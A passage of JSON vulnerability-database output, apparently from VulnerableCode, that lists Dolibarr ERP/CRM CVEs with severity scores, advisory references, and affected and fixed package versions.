g-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4"}],"aliases":["CVE-2019-19211","GHSA-gfhf-2xr5-2fvw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x7qz-jffh-9ydk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/313683?format=json","vulnerability_id":"VCID-y2yy-zrhp-rba3","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19210","reference_id":"","reference_type":"","scores":[{"value":"0.00606","scoring_system":"epss","scoring_elements":"0.7014","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19210"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0052","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0052"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19210","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19210"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384973?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3zrg-f35e-ayea"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"}],"aliases":["CVE-2019-19210","GHSA-87r3-4gc8-f897"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y2yy-zrhp-rba3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/162859?format=json","vulnerability_id":"VCID-zwts-bt1w-p7a4","summary":"Dolibarr Open Source ERP & CRM for Business before v14.0.1 allows attackers to escalate privileges via a crafted API.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138","reference_id":"","reference_type":"","scores":[{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55806","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d"},{"reference_url":"https://www.exploit-db.com/exploits/50248","reference_id":"50248","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-30T14:07:50Z/"}],"url":"https://www.exploit-db.com/exploits/50248"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138","reference_id":"CVE-2022-43138","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138"},{"reference_url":"https://github.com/advisories/GHSA-gh7m-j673-wm97","reference_id":"GHSA-gh7m-j673-wm97","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gh7m-j673-wm97"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19978?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2022-43138","GHSA-gh7m-j673-wm97"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zwts-bt1w-p7a4"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/296910?format=json","vulnerability_id":"VCID-5zez-y5w9-7kb2","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-8879","reference_id":"","reference_type":"","scores":[{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15355","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-8879"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-8879","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-8879"},{"reference_url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/389105?format=json","purl":"pkg:composer/dolibarr/dolibarr@4.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-375c-7shu-37bu"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-65zj-gtdx-7ydm"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qyxz-nb5d-3qa8"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-s6s3-p34a-muh3"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@4.0.5"}],"aliases":["CVE-2017-8879","GHSA-5x4j-xcmv-v3q2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5zez-y5w9-7kb2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/296201?format=json","vulnerability_id":"VCID-7t11-s13x-h3en","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-7887","reference_id":"","reference_type":"","scores":[{"value":"0.00187","scoring_system":"epss","scoring_elements":"0.40444","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-7887"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-7887","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-7887"},{"reference_url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/389105?format=json","purl":"pkg:composer/dolibarr/dolibarr@4.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-375c-7shu-37bu"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-65zj-gtdx-7ydm"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qyxz-nb5d-3qa8"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-s6s3-p34a-muh3"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@4.0.5"}],"aliases":["CVE-2017-7887","GHSA-x2fq-gq6c-hp44"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7t11-s13x-h3en"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/296200?format=json","vulnerability_id":"VCID-fsra-27pw-7fbz","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-7886","reference_id":"","reference_type":"","scores":[{"value":"0.00211","scoring_system":"epss","scoring_elements":"0.43668","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-7886"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-7886","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-7886"},{"reference_url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/389105?format=json","purl":"pkg:composer/dolibarr/dolibarr@4.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-375c-7shu-37bu"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-65zj-gtdx-7ydm"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qyxz-nb5d-3qa8"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-s6s3-p34a-muh3"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@4.0.5"}],"aliases":["CVE-2017-7886","GHSA-gw37-vmvw-f833"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fsra-27pw-7fbz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/296202?format=json","vulnerability_id":"VCID-vss8-eqj1-kkcm","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-7888","reference_id":"","reference_type":"","scores":[{"value":"0.00156","scoring_system":"epss","scoring_elements":"0.36194","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-7888"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-7888","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-7888"},{"reference_url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.foxmole.com/advisories/foxmole-2017-02-23.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/389105?format=json","purl":"pkg:composer/dolibarr/dolibarr@4.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-375c-7shu-37bu"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-65zj-gtdx-7ydm"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qyxz-nb5d-3qa8"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-s6s3-p34a-muh3"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnera